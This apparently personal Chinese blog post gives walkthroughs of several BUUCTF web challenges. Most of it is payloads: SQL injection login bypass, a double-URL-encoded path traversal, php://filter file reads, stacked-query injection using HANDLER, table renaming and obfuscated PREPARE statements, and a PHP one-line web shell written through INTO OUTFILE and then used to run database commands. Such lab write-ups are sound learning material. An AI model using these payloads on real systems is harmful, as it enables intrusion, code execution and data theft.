

<!DOCTYPE html>
<html lang="zh-Hans" color-mode=light>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>buu1-web - Almond&#39;s Blog</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />
  
  <meta name="description" content="出完misc，不如来刷点web是吧
[极客大挑战 20...">
  <meta name="author" content="Almond">
  <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
    <meta rel="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1445822_r673sha78lq.css">

  

  
    
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
    
      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css" name="highlight-style" mode="light">

      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-dark.min.css" name="highlight-style" mode="dark">

      
  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      lazyload: {
        enable: true,
        only_post: 'false',
        loading: '[object Object]'
      },
      donate: {
        enable: false,
        alipay: 'https://pic.izhaoo.com/alipay.jpg',
        wechat: 'https://pic.izhaoo.com/wechat.jpg'
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        always_show: false
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: false
      },
      preview: {
        background: {
          default: '',
          api: ''
        },
        motto: {
          default: '听   说   你   在   看   我   博   客   ？',
          typing: false,
          api: '',
          data_contents: '["data","content"]'
        },
      },
      qrcode: {
        enable: false,
        type: 'url',
        image: 'https://pic.izhaoo.com/weapp-code.jpg',
      },
      toc: {
        enable: true
      },
      scrollbar: {
        type: 'default'
      },
      notification: {
        enable: false,
        delay: 4500,
        list: '',
        page_white_list: '',
        page_black_list: ''
      },
      search: {
        enable: true,
        path: 'search.xml'
      }
    }
  </script>

  

  

<meta name="generator" content="Hexo 5.2.0"></head>

<body class="lock-screen">
  <div class="loading"></div>
  
    


  <nav class="navbar">
    <div class="left">
      
        <i class="iconfont iconhome j-navbar-back-home"></i>
      
      
      
        <i class="iconfont iconmoono" id="color-toggle" color-toggle="light"></i>
      
      
        <i class="iconfont iconsearch j-navbar-search"></i>
      
    </div>
    <div class="center">buu1-web</div>
    <div class="right">
      <i class="iconfont iconmenu j-navbar-menu"></i>
    </div>
    
  </nav>

  
  

<nav class="menu">
  <div class="menu-container">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content"><li class="menu-item">
        <a href="/ " class="underline "> 首页</a>
      </li><li class="menu-item">
        <a href="/archives/ " class="underline "> 归档</a>
      </li><li class="menu-item">
        <a href="/tags/ " class="underline "> 标签</a>
      </li><li class="menu-item">
        <a href="/categories/ " class="underline "> 分类</a>
      </li><li class="menu-item">
        <a href="/about/ " class="underline "> 关于</a>
      </li></ul>
    
      <div class="menu-copyright"><p>© 2021 Almond | Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
    
  </div>
</nav>
  <main id="main">
  <div class="article-wrap">
    <div class="row container">
      <div class="col-xl-3"></div>
      <div class="col-xl-6"><article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="/images/theme/post-image9.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">buu1-web</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>January 13, 2022</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>10683</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        <p>出完misc，不如来刷点web是吧</p>
<h1 id="极客大挑战-2019-EasySQL"><a href="#极客大挑战-2019-EasySQL" class="headerlink" title="[极客大挑战 2019]EasySQL"></a>[极客大挑战 2019]EasySQL</h1><p>万能密码登录即可，</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lsl"><span class="hljs-number">1</span>&#x27; or <span class="hljs-number">1</span>=<span class="hljs-number">1</span>#<br></code></pre></td></tr></table></figure>

<p>密码随便都行</p>
<h1 id="HCTF-2018-WarmUp"><a href="#HCTF-2018-WarmUp" class="headerlink" title="[HCTF 2018]WarmUp"></a>[HCTF 2018]WarmUp</h1><p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220113195617361.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220113195617361</span></p>
<p>source.php    嗯打开试试，</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    highlight_file(<span class="hljs-keyword">__FILE__</span>);<span class="hljs-comment">//打印代码</span><br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">emmm</span>//定义<span class="hljs-title">emmm</span>类</span><br><span class="hljs-class">    </span>&#123;<br>        public static function checkFile(&amp;$page)//将传入参数赋给$page<br>        &#123;<br>            $whitelist = [<span class="hljs-string">&quot;source&quot;</span>=&gt;<span class="hljs-string">&quot;source.php&quot;</span>,<span class="hljs-string">&quot;hint&quot;</span>=&gt;<span class="hljs-string">&quot;hint.php&quot;</span>];<span class="hljs-comment">//$whitelist白名单数组</span><br>            <span class="hljs-keyword">if</span> (! <span class="hljs-keyword">isset</span>($page) || !is_string($page)) &#123;<span class="hljs-comment">//变量不存在或者不是字符串</span><br>                <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;you can&#x27;t see it&quot;</span>;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>            &#125;<br><br>            <span class="hljs-keyword">if</span> (in_array($page, $whitelist)) &#123;<span class="hljs-comment">//$page变量在$whitelist中</span><br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>            &#125;<br><br>            $_page = mb_substr(<span class="hljs-comment">//该代码表示截取$page中&#x27;?&#x27;前部分，若无则截取整个$page</span><br>                $page,<br>                <span class="hljs-number">0</span>,<br>                mb_strpos($page . <span class="hljs-string">&#x27;?&#x27;</span>, <span class="hljs-string">&#x27;?&#x27;</span>)<br>            );<br>            <span class="hljs-keyword">if</span> (in_array($_page, $whitelist)) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>            &#125;<br><br>            $_page = urldecode($page);<span class="hljs-comment">//url解码$page</span><br>            $_page = mb_substr(<br>                $_page,<br>                <span class="hljs-number">0</span>,<br>                mb_strpos($_page . <span class="hljs-string">&#x27;?&#x27;</span>, <span class="hljs-string">&#x27;?&#x27;</span>)<br>            );<br>            <span class="hljs-keyword">if</span> (in_array($_page, $whitelist)) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>            &#125;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;you can&#x27;t see it&quot;</span>;<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-keyword">if</span> (! <span class="hljs-keyword">empty</span>($_REQUEST[<span class="hljs-string">&#x27;file&#x27;</span>])<span class="hljs-comment">//$_REQUEST[&#x27;file&#x27;]非空</span><br>        &amp;&amp; is_string($_REQUEST[<span class="hljs-string">&#x27;file&#x27;</span>])<span class="hljs-comment">//$_REQUEST[&#x27;file&#x27;]值为字符串</span><br>        &amp;&amp; emmm::checkFile($_REQUEST[<span class="hljs-string">&#x27;file&#x27;</span>])<span class="hljs-comment">//能通过checkFile函数检查</span><br>    ) &#123;<br>        <span class="hljs-keyword">include</span> $_REQUEST[<span class="hljs-string">&#x27;file&#x27;</span>];<span class="hljs-comment">//包含$_REQUEST[&#x27;file&#x27;]文件</span><br>        <span class="hljs-keyword">exit</span>;<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;</span>;<span class="hljs-comment">//打印滑稽表情</span><br>    &#125;  <br><span class="hljs-meta">?&gt;</span><br><br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220113195904381.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220113195904381</span></p>
<p>看到hint 就是了一下，嗯这个提示，那么只要能成功访问ffffllllaaaagggg就行</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html">http://xxxx:xxxx/source.php?file=source.php%253f../../../../../ffffllllaaaagggg<br></code></pre></td></tr></table></figure>

<p>%253f为？编码两次的结果，前面的source.php?用于绕过白名单</p>
<p>然后第二次进行url解码只会对？解码一次此时得到的结果为？的一次url编码，实现绕过，../是因为不确定ffffllllaaaagggg在那个具体位置，依次增加即可访问成功，获得flag</p>
<h1 id="极客大挑战-2019-Havefun"><a href="#极客大挑战-2019-Havefun" class="headerlink" title="[极客大挑战 2019]Havefun"></a>[极客大挑战 2019]Havefun</h1><p>可爱猫猫，</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220114165225417.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220114165225417</span></p>
<p>让cat=dog就行</p>
<h1 id="ACTF2020-新生赛-Include"><a href="#ACTF2020-新生赛-Include" class="headerlink" title="[ACTF2020 新生赛]Include"></a>[ACTF2020 新生赛]Include</h1><p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220114170700958.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220114170700958</span></p>
<p>这又是一个找flag的环节，利用php://filter伪协议进行文件包含，payload如下</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs html">http://ec242c45-b53e-4213-a42b-bb8a5a97bcac.node4.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php<br></code></pre></td></tr></table></figure>

<p>把读出来的内容转base64就行</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220114171237380.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220114171237380</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220114173527938.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220114173527938</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220114173659426.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220114173659426</span></p>
<p>参考引用<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45642610/article/details/112427044">https://blog.csdn.net/weixin_45642610/article/details/112427044</a></p>
<h1 id="强网杯-2019-随便注"><a href="#强网杯-2019-随便注" class="headerlink" title="[强网杯 2019]随便注"></a>[强网杯 2019]随便注</h1><p>用sqlmap用惯了，就不太行，这里考察的是堆叠注入，先看看有什么好了</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220116121852873.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220116121852873</span></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220116122619145.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220116122619145</span></p>
<p>这边打了1‘ union select 1,2,database() #,发现了一大堆的过滤，但是这不影响用堆叠呀</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">1&#x27;;<span class="hljs-keyword">show</span> <span class="hljs-keyword">databases</span>;<span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220116123025601.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220116123025601</span></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">1&#x27;;<span class="hljs-keyword">show</span> <span class="hljs-keyword">tables</span>;<span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220116123339409.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220116123339409</span></p>
<p>查不到表的具体内容欸</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220116123745195.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220116123745195</span></p>
<p>查了才知道这里要使用反引号 <code>  </code></p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220116123834423.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220116123834423</span></p>
<p>发现flag</p>
<p>再查询words</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220116124857126.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220116124857126</span></p>
<p>，也就是直接查询的结果都来自words中，</p>
<p>那么我们也可以用一些很好的方法（jiyinqiaoji）</p>
<h2 id="方法一：handler查询"><a href="#方法一：handler查询" class="headerlink" title="方法一：handler查询"></a>方法一：handler查询</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs mysql">1&#39;;<br>handler &#96;1919810931114514&#96; open;<br>handler &#96;1919810931114514&#96; read first;-- +<br></code></pre></td></tr></table></figure>

<h3 id="关于handler"><a href="#关于handler" class="headerlink" title="关于handler"></a>关于handler</h3><p>handler可以直接打开这个表，mysql除可使用select查询表中的数据，也可使用handler语句，这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不具备select语句的所有功能。它是mysql专用的语句，并没有包含到SQL标准中。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs mysql">HANDLER tbl_name OPEN [ [AS] alias]<br># 打开一张表，无返回结果，实际上声明了一个名为tb1_name的句柄。<br>HANDLER tbl_name READ index_name &#123; &#x3D; | &lt;&#x3D; | &gt;&#x3D; | &lt; | &gt; &#125; (value1,value2,...)<br>    [ WHERE where_condition ] [LIMIT ... ]<br>HANDLER tbl_name READ index_name &#123; FIRST | NEXT | PREV | LAST &#125;<br>    [ WHERE where_condition ] [LIMIT ... ]<br>HANDLER tbl_name READ &#123; FIRST | NEXT &#125;<br>    [ WHERE where_condition ] [LIMIT ... ]<br># 获取句柄的第一行，通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。<br>HANDLER tbl_name CLOSE<br># 关闭打开的句柄。<br><br></code></pre></td></tr></table></figure>



<h2 id="方法二：重命名"><a href="#方法二：重命名" class="headerlink" title="方法二：重命名"></a>方法二：重命名</h2><p>那么把藏有flag的表及列名改掉</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mysql">1&#39;；rename tables words to words1;rename table &#96;1919810931114514&#96; to words;alter table words change flag id varchar(100) CHARACTERS SET utf8 COLLATE utf8_genneral_ci NOT NULL;desc words;<br></code></pre></td></tr></table></figure>

<p>CHARACTERS SET utf8 ：数据库字符集，设置为utf-8</p>
<p>COLLATE utf8_genneral_ci ：数据库校对规则。ci是case insensitive的缩写，意思是大小写不敏感；相对的是cs，即case sensitive，大小写敏感；还有一种是utf8_bin，是将字符串中的每一个字符用二进制数据存储，区分大小写。</p>
<p>然后直接使用万能密码</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs lsl"><span class="hljs-number">1</span>&#x27; or <span class="hljs-number">1</span>=<span class="hljs-number">1</span>#<br></code></pre></td></tr></table></figure>

<p>就可以直接查询到flag了</p>
<h2 id="方法三：预处理语句"><a href="#方法三：预处理语句" class="headerlink" title="方法三：预处理语句"></a>方法三：预处理语句</h2><h3 id="关于预处理语句"><a href="#关于预处理语句" class="headerlink" title="关于预处理语句"></a>关于预处理语句</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">PREPARE</span> <span class="hljs-keyword">name</span> <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;[my sql sequece]&#x27;</span>;   //预定义SQL语句<br><span class="hljs-keyword">EXECUTE</span> <span class="hljs-keyword">name</span>;  //执行预定义SQL语句<br>(<span class="hljs-keyword">DEALLOCATE</span> || <span class="hljs-keyword">DROP</span>) <span class="hljs-keyword">PREPARE</span> <span class="hljs-keyword">name</span>;  //删除预定义SQL语句<br>　//预定义语句也可以通过变量进行传递:　<br><span class="hljs-keyword">SET</span> @tn = <span class="hljs-string">&#x27;hahaha&#x27;</span>;  //存储表名<br><span class="hljs-keyword">SET</span> @<span class="hljs-keyword">sql</span> = <span class="hljs-keyword">concat</span>(<span class="hljs-string">&#x27;select * from &#x27;</span>, @tn);  //存储SQL语句<br><span class="hljs-keyword">PREPARE</span> <span class="hljs-keyword">name</span> <span class="hljs-keyword">from</span> @<span class="hljs-keyword">sql</span>;   //预定义SQL语句<br><span class="hljs-keyword">EXECUTE</span> <span class="hljs-keyword">name</span>;  //执行预定义SQL语句<br>(<span class="hljs-keyword">DEALLOCATE</span> || <span class="hljs-keyword">DROP</span>) <span class="hljs-keyword">PREPARE</span> sqla;  //删除预定义SQL语句<br><span class="hljs-keyword">set</span>用于设置变量名和值<br><span class="hljs-keyword">prepare</span>用于预备一个语句，并赋予名称，以后可以引用该语句<br><span class="hljs-keyword">execute</span>执行语句<br><span class="hljs-keyword">deallocate</span> <span class="hljs-keyword">prepare</span>用来释放掉预处理的语句<br><br></code></pre></td></tr></table></figure>

<p>char(115,101,108,101,99,116)为select</p>
<h4 id="payload1-不使用变量"><a href="#payload1-不使用变量" class="headerlink" title="payload1:不使用变量"></a>payload1:不使用变量</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">1&#x27;;<span class="hljs-keyword">PREPARE</span> hacker <span class="hljs-keyword">from</span> <span class="hljs-keyword">concat</span>(<span class="hljs-built_in">char</span>(<span class="hljs-number">115</span>,<span class="hljs-number">101</span>,<span class="hljs-number">108</span>,<span class="hljs-number">101</span>,<span class="hljs-number">99</span>,<span class="hljs-number">116</span>), <span class="hljs-string">&#x27; * from `1919810931114514` &#x27;</span>);<span class="hljs-keyword">EXECUTE</span> hacker;<span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure>

<h4 id="payload2-使用变量"><a href="#payload2-使用变量" class="headerlink" title="payload2:使用变量"></a>payload2:使用变量</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">1&#x27;;<span class="hljs-keyword">SET</span> @sqli=<span class="hljs-keyword">concat</span>(<span class="hljs-built_in">char</span>(<span class="hljs-number">115</span>,<span class="hljs-number">101</span>,<span class="hljs-number">108</span>,<span class="hljs-number">101</span>,<span class="hljs-number">99</span>,<span class="hljs-number">116</span>),<span class="hljs-string">&#x27;* from `1919810931114514`&#x27;</span>);<span class="hljs-keyword">PREPARE</span> hacker <span class="hljs-keyword">from</span> @sqli;<span class="hljs-keyword">EXECUTE</span> hacker;<span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure>

<h4 id="payload3-只使用concat"><a href="#payload3-只使用concat" class="headerlink" title="payload3:只使用concat()"></a>payload3:只使用concat()</h4><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">1&#x27;;<span class="hljs-keyword">PREPARE</span> hacker <span class="hljs-keyword">from</span> <span class="hljs-keyword">concat</span>(<span class="hljs-string">&#x27;s&#x27;</span>,<span class="hljs-string">&#x27;elect&#x27;</span>, <span class="hljs-string">&#x27; * from `1919810931114514` &#x27;</span>);<span class="hljs-keyword">EXECUTE</span> hacker;<span class="hljs-comment">#</span><br></code></pre></td></tr></table></figure>

<h2 id="方法四：谁会想到这题可以写个shell呢"><a href="#方法四：谁会想到这题可以写个shell呢" class="headerlink" title="方法四：谁会想到这题可以写个shell呢"></a>方法四：<del>谁会想到这题可以写个shell呢</del></h2><p>先查询一下用户</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">1&#x27;;<span class="hljs-keyword">set</span> @<span class="hljs-keyword">sql</span>=<span class="hljs-keyword">concat</span>(<span class="hljs-string">&quot;s&quot;</span>,<span class="hljs-string">&quot;elect user()&quot;</span>);<span class="hljs-keyword">prepare</span> sqla <span class="hljs-keyword">from</span> @<span class="hljs-keyword">sql</span>;<span class="hljs-keyword">execute</span> sqla;<br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220119150243479.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220119150243479</span></p>
<p>strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串。如果是，则该函数返回str2在str1中首次出现的地址；否则，返回NULL，这里可以通过大小写进行绕过</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">1&#x27;;<span class="hljs-keyword">Set</span> @<span class="hljs-keyword">sql</span>=<span class="hljs-keyword">concat</span>(<span class="hljs-string">&quot;s&quot;</span>,<span class="hljs-string">&quot;elect user()&quot;</span>);<span class="hljs-keyword">Prepare</span> sqla <span class="hljs-keyword">from</span> @<span class="hljs-keyword">sql</span>;<span class="hljs-keyword">execute</span> sqla;<br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220119150818554.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220119150818554</span></p>
<p>由于这题是root权限，那么就可以，往网址写shell，这个路径wp说是猜的</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs sql">1&#x27;;<span class="hljs-keyword">Set</span> @<span class="hljs-keyword">sql</span>=<span class="hljs-keyword">concat</span>(<span class="hljs-string">&quot;s&quot;</span>,<span class="hljs-string">&quot;elect &#x27;&lt;?php @print_r(`$_GET[1]`);?&gt;&#x27; into outfile &#x27;/var/www/html/1&quot;</span>,<span class="hljs-built_in">char</span>(<span class="hljs-number">46</span>),<span class="hljs-string">&quot;php&#x27;&quot;</span>);<span class="hljs-keyword">PREPARE</span> sqla <span class="hljs-keyword">from</span> @<span class="hljs-keyword">sql</span>;<span class="hljs-keyword">EXECUTE</span> sqla;<br>//这里利用into outfile 生成PHP文件，利用char(46)绕过黑名单中的符号.<br><span class="hljs-comment">/*print_r() 函数用于打印变量，以更容易理解的形式展示。</span><br><span class="hljs-comment">	</span><br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220119154611509.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220119154611509</span></p>
<p>这里使用该函数为了后面能成功打印出flag</p>
<p>这里并没有没有回显，但是，直接通过一句话木马去访问数据库</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql">/1.php?1=mysql -uroot -proot -e &quot;<span class="hljs-keyword">use</span> supersqli;<span class="hljs-keyword">select</span> flag <span class="hljs-keyword">from</span> \<span class="hljs-string">`1919810931114514\`</span>;&quot;<br></code></pre></td></tr></table></figure>

<p>这里账号密码均为root，1被赋值的内容会被传入到一句话木马中并执行</p>
<p><img   class="lazyload" data-original="/2022/01/13/buu1-web/image-20220119151755074.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220119151755074</span></p>
<p>即可拿到flag</p>
<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>从docker的源码中可以发现，本题使用multi_query()执行一条或多条sql语句，然后将结果全部输出，这也是为什么堆叠注入可以成功的原因了</p>
